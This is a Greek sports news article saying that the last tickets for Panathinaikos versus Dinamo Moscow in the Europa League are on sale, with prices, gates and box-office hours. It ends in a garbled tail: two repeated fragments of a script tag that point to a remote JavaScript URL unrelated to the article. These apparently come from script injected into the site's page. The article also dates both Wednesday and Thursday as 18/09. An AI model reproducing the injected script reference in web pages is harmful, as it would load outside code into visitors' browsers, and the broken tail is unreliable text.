Παναθηναϊκός: Τα τελευταία εισιτήρια για Ντιναμό

Παναθηναϊκός: Τα τελευταία εισιτήρια για Ντιναμό | onsports.gr

Ελάχιστα εισιτήρια έχουν απομείνει για την αναμέτρηση Παναθηναϊκός – Ντιναμό Μόσχας στο πλαίσιο της πρεμιέρας της φάσης των ομίλων του Europa League.

Ο κόσμος του Παναθηναϊκού περιμένει να δει ξανά την ομάδα του να αγωνίζεται σε φάση ομίλων ευρωπαϊκής διοργάνωσης και δεν άφησε την ευκαιρία να πάει χαμένη. Κόντρα στη Ντιναμό Μόσχας η Λεωφόρος θα είναι κατάμεστη, καθώς τα εισιτήρια που έχουν κυκλοφορήσει αναμένεται να εξαντληθούν το πρωί της Τετάρτης (18/09) καθώς έχουν απομείνει πλέον ελάχιστα.

Οι φίλοι του Παναθηναϊκού έχουν την ευκαιρία να προμηθευτούν κάποια εισιτήρια που έχουν προκύψει από επιστροφές συνδέσμων και είναι στις θύρες 7 και 14. Η τιμή τους ανέρχεται στα 10 ευρώ για τα μέλη της Παναθηναϊκής Συμμαχίας και στα 15 ευρώ για τα μη μέλη. Τα εκδοτήρια στη Λεωφόρο , συγκεκριμένα στη Θύρα 4, ανοίγουν στις 10:00 το πρωί κι όσοι επιθυμούν να είναι στο γήπεδο το βράδυ της Πέμπτης (18/09) θα πρέπει να… σπεύσουν.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>